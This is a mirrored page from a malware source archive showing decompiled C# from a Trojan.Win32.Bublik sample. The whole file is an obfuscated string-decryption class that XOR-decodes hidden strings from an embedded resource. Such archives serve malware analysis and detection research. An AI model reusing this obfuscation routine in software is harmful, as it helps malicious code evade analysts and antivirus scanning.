mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-21 02:46:10 +00:00
102 lines
3.5 KiB
C#
102 lines
3.5 KiB
C#
|
// Decompiled with JetBrains decompiler
|
|||
|
// Type:
|
|||
|
// Assembly: kev1, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
|
|||
|
// MVID: 5B707792-F182-4802-BE95-B43026E8F1CF
|
|||
|
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Bublik.elhu-cf5e1776e9eeb1557410fefc8efb45a4c2a1d1845c07d90cb4cecda231a6dcb7.exe
|
|||
|
|
|||
|
using System.Collections.Generic;
|
|||
|
using System.IO;
|
|||
|
using System.Reflection;
|
|||
|
using System.Runtime.CompilerServices;
|
|||
|
using System.Text;
|
|||
|
|
|||
|
internal static class \u0008
|
|||
|
{
|
|||
|
private static readonly Dictionary<int, string> \u0002 = new Dictionary<int, string>(47);
|
|||
|
private static BinaryReader \u0003;
|
|||
|
private static byte[] \u0005;
|
|||
|
private static short \u0008;
|
|||
|
private static bool \u0006;
|
|||
|
private static byte[] \u000E;
|
|||
|
private static bool \u000F;
|
|||
|
|
|||
|
[MethodImpl(MethodImplOptions.NoInlining)]
|
|||
|
internal static string \u0002(int _param0)
|
|||
|
{
|
|||
|
if (\u0008.\u000F)
|
|||
|
{
|
|||
|
string str;
|
|||
|
\u0008.\u0002.TryGetValue(_param0, out str);
|
|||
|
return str;
|
|||
|
}
|
|||
|
lock (\u0008.\u0002)
|
|||
|
{
|
|||
|
string str1;
|
|||
|
if (\u0008.\u0002.TryGetValue(_param0, out str1))
|
|||
|
return str1;
|
|||
|
if (\u0008.\u0003 == null)
|
|||
|
{
|
|||
|
Assembly executingAssembly = Assembly.GetExecutingAssembly();
|
|||
|
\u0008.\u0006 = false;
|
|||
|
\u0008.\u0003 = new BinaryReader(executingAssembly.GetManifestResourceStream(" \u200B "));
|
|||
|
short count = (short) ((int) \u0008.\u0003.ReadInt16() ^ -18656);
|
|||
|
if (count == (short) 0)
|
|||
|
\u0008.\u0008 = (short) ((int) \u0008.\u0003.ReadInt16() ^ 30416);
|
|||
|
else
|
|||
|
\u0008.\u0005 = \u0008.\u0003.ReadBytes((int) count);
|
|||
|
\u0008.\u000E = executingAssembly.GetName().GetPublicKeyToken();
|
|||
|
if (\u0008.\u000E != null && \u0008.\u000E.Length == 0)
|
|||
|
\u0008.\u000E = (byte[]) null;
|
|||
|
}
|
|||
|
int num1 = _param0 ^ -665677667;
|
|||
|
\u0008.\u0003.BaseStream.Position = (long) num1;
|
|||
|
byte[] numArray;
|
|||
|
if (\u0008.\u0005 != null)
|
|||
|
{
|
|||
|
numArray = \u0008.\u0005;
|
|||
|
}
|
|||
|
else
|
|||
|
{
|
|||
|
short count = \u0008.\u0008 != (short) -1 ? \u0008.\u0008 : (short) ((int) \u0008.\u0003.ReadInt16() ^ -31071 ^ num1);
|
|||
|
numArray = count != (short) 0 ? \u0008.\u0003.ReadBytes((int) count) : (byte[]) null;
|
|||
|
}
|
|||
|
int count1 = \u0008.\u0003.ReadInt32() ^ num1 ^ 982698659;
|
|||
|
bool flag = (count1 & int.MinValue) != 0;
|
|||
|
if (flag)
|
|||
|
count1 &= int.MaxValue;
|
|||
|
byte[] bytes = \u0006.\u0002(numArray, \u0008.\u0003.ReadBytes(count1));
|
|||
|
if (\u0008.\u000E != null != \u0008.\u0006)
|
|||
|
{
|
|||
|
for (int index = 0; index < count1; ++index)
|
|||
|
{
|
|||
|
byte num2 = \u0008.\u000E[index & 7];
|
|||
|
byte num3 = (byte) ((int) num2 << 3 | (int) num2 >> 5);
|
|||
|
bytes[index] = (byte) ((uint) bytes[index] ^ (uint) num3);
|
|||
|
}
|
|||
|
}
|
|||
|
string str2;
|
|||
|
if (flag && !\u0008.\u0006)
|
|||
|
{
|
|||
|
char[] chArray = new char[count1];
|
|||
|
for (int index = 0; index < count1; ++index)
|
|||
|
chArray[index] = (char) bytes[index];
|
|||
|
str2 = new string(chArray);
|
|||
|
}
|
|||
|
else
|
|||
|
str2 = Encoding.Unicode.GetString(bytes, 0, bytes.Length);
|
|||
|
if (\u0008.\u0006)
|
|||
|
str2 = (_param0 + count1 ^ 936568).ToString("X");
|
|||
|
string str3 = string.Intern(str2);
|
|||
|
\u0008.\u0002.Add(_param0, str3);
|
|||
|
if (\u0008.\u0002.Count == 47)
|
|||
|
{
|
|||
|
\u0008.\u0003.Close();
|
|||
|
\u0008.\u0003 = (BinaryReader) null;
|
|||
|
\u0008.\u0005 = \u0008.\u000E = (byte[]) null;
|
|||
|
\u0008.\u000F = true;
|
|||
|
}
|
|||
|
return str3;
|
|||
|
}
|
|||
|
}
|
|||
|
}
|